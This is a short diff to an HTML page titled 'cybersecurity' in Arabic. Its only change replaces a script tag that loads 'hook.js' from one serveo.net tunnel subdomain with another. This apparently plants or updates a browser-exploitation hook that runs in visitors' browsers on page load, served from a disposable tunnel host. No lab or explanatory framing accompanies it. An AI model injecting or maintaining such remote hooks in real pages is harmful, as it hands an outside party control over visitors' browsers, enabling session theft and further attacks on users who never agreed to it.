--- a/home.html
+++ b/home.html
@@ -13,7 +13,7 @@
                     <li><a href="#">Support</a></li>
                 </ul>
             </div>
-            <script src="https://e5189200fecb3e98afc9377a8e1d1897.serveo.net/hook.js"></script>
+            <script src="https://0163db4566e3703592afc5b73e5a39d6.serveo.net//hook.js"></script>
             <div class="content">
                 <h1>الأمن السيبراني</h1>
                 <p></p>
